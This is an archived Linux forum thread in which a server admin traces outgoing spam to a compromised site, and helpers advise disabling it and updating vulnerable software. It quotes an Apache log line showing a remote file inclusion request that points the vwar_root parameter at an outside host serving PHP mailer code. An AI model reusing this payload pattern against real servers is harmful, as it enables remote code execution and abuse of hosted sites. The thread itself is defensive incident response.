HowtoForge Forums | HowtoForge - Linux Howtos and Tutorials

HowtoForge Forums | HowtoForge - Linux Howtos and Tutorials (http://www.howtoforge.com/forums/index.php)
-   General (http://www.howtoforge.com/forums/forumdisplay.php?f=15)
-   -   spam from my server ? (http://www.howtoforge.com/forums/showthread.php?t=4354)

rayit 17th May 2006 08:30

spam from my server from account www-data?
 
Seems my server was listed on some spam filter sites..

I see al lot of messages in the mailq.
all starting with www-data@.....

how to prevend this, what is it???


thanks

Raymond
RayIT

After some googling something like this should be in the vhost file
to know which domain is giving the problem???

php_admin_value sendmail_path "/usr/sbin/sendmail -t -i -fUSER at example.com"

maybe for future updates of ISPCONFIG??

Are there other sollutions??

<b>Biggest problem is I can not find the website which has the bad script??!!!</b>

example:

May 17 06:39:07 ns1 postfix/qmgr[32348]: 60A0C372868: from=<www-data@ns1.rayit.com>, size=4422, nrcpt=1 (queue active)
May 17 06:39:07 ns1 postfix/qmgr[32348]: 6559F3728E0: from=<www-data@ns1.rayit.com>, size=4423, nrcpt=1 (queue active)
May 17 06:39:07 ns1 postfix/qmgr[32348]: 6D48E373256: from=<www-data@ns1.rayit.com>, size=4418, nrcpt=1 (queue active)
May 17 06:39:07 ns1 postfix/qmgr[32348]: 66857372E3C: from=<www-data@ns1.rayit.com>, size=4423, nrcpt=1 (queue active)
May 17 06:39:07 ns1 postfix/qmgr[32348]: 6CA233732CE: from=<www-data@ns1.rayit.com>, size=4427, nrcpt=1 (queue active)
May 17 06:39:07 ns1 postfix/qmgr[32348]: 619D9372802: from=<www-data@ns1.rayit.com>, size=4422, nrcpt=1 (queue active)
May 17 06:39:07 ns1 postfix/qmgr[32348]: 67217372C41: from=<www-data@ns1.rayit.com>, size=4412, nrcpt=1 (queue active)
May 17 06:39:07 ns1 postfix/qmgr[32348]: 6A6FA372831: from=<www-data@ns1.rayit.com>, size=4425, nrcpt=1 (queue active)
May 17 06:39:07 ns1 postfix/qmgr[32348]: 6F496372827: from=<www-data@ns1.rayit.com>, size=4419, nrcpt=1 (queue active)
May 17 06:39:07 ns1 postfix/qmgr[32348]: 650D6372B01: from=<www-data@ns1.rayit.com>, size=4417, nrcpt=1 (queue active)
May 17 06:39:07 ns1 postfix/qmgr[32348]: 61AD43728AE: from=<www-data@ns1.rayit.com>, size=4418, nrcpt=1 (queue active)
May 17 06:39:07 ns1 postfix/qmgr[32348]: 627E7372D8A: from=<www-data@ns1.rayit.com>, size=4424, nrcpt=1 (queue active)
May 17 06:39:07 ns1 postfix/qmgr[32348]: 64C7237317B: from=<www-data@ns1.rayit.com>, size=4421, nrcpt=1 (queue active)
May 17 06:39:07 ns1 postfix/qmgr[32348]: 69DCD3729D5: from=<www-data@ns1.rayit.com>, size=4412, nrcpt=1 (queue active)
May 17 06:39:07 ns1 postfix/qmgr[32348]: 694713729E7: from=<www-data@ns1.rayit.com>, size=4418, nrcpt=1 (queue active)
May 17 06:39:07 ns1 postfix/qmgr[32348]: 65149372A83: from=<www-data@ns1.rayit.com>, size=4415, nrcpt=1 (queue active)
May 17 06:39:07 ns1 postfix/qmgr[32348]: 67DEA372EF5: from=<www-data@ns1.rayit.com>, size=4415, nrcpt=1 (queue active)
May 17 06:39:07 ns1 postfix/qmgr[32348]: 67FFC372EFA: from=<www-data@ns1.rayit.com>, size=4414, nrcpt=1 (queue active)
May 17 06:39:07 ns1 postfix/qmgr[32348]: 6BEB1372EA2: from=<www-data@ns1.rayit.com>, size=4418, nrcpt=1 (queue active)
May 17 06:39:07 ns1 postfix/qmgr[32348]: 63935372D18: from=<www-data@ns1.rayit.com>, size=4418, nrcpt=1 (queue active)
May 17 06:39:07 ns1 postfix/qmgr[32348]: 6B528372FF8: from=<www-data@ns1.rayit.com>, size=4423, nrcpt=1 (queue active)

falko 17th May 2006 15:09

Seems like someone is abusing a contact form, guestbook, etc. on one of your web sites to send spam...

rayit 17th May 2006 15:40

how do i know which web?
 
I can not find which web is causing the problem.

:eek:

falko 17th May 2006 16:09

You could check your Apache's access log.

rayit 17th May 2006 16:42

help...
 
can find nothing in the apache log files

maybe have a look?

http://www.rayit.com/syslog

and

http://www.rayit.com/ispconfig_access_log

please have a look for me...

rayit 17th May 2006 23:38

problem probably found
 
www.bob-gaming.nl||||163464||||81.199.83.160 - - [17/May/2006:10:29:27 +0200]
"POST /modules/vwar/admin/admin.php?vwar_root=http://albax.host.sk/.xpl/phpmailer.txt?
HTTP/1.1" 200 163464
"http://www.bob-gaming.nl/modules/vwar/admin/admin.php?vwar_root=http://albax.host.sk/.xpl/phpmailer.txt?"
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"


Seems to be the problem, I think.

Norman 17th May 2006 23:50

Turn him off asap and ask user to resolve.

till 18th May 2006 08:30

I can only agree to Norman, turn the account off as soon as possible, e.g. with an .htaccess file. Your spam problem seems to be only the pike of the iceberg. The script seems to allow execution of external PHP code provided by an URL to the variable vwar_root.

rayit 18th May 2006 13:07

thanks
 
I chmod 000 the files and made user root
hopefully if user will update to newest release problems will be fixed..

Will point the webmaster of the site to

http://www.vwar.de/

various security leaks which could allow malicious users to include a (remote) file and eg. execute php commands on the server hosting vwar

thanks

Raymond
RayIT

dayjahone 15th March 2012 15:37

I think I have the same problem. Sorry for the lame question, but where do I go to look at the apache log? I'm running Ubuntu.


All times are GMT +2. The time now is 07:41.

Powered by vBulletin® Version 3.8.7
Copyright ©2000 - 2014, vBulletin Solutions, Inc.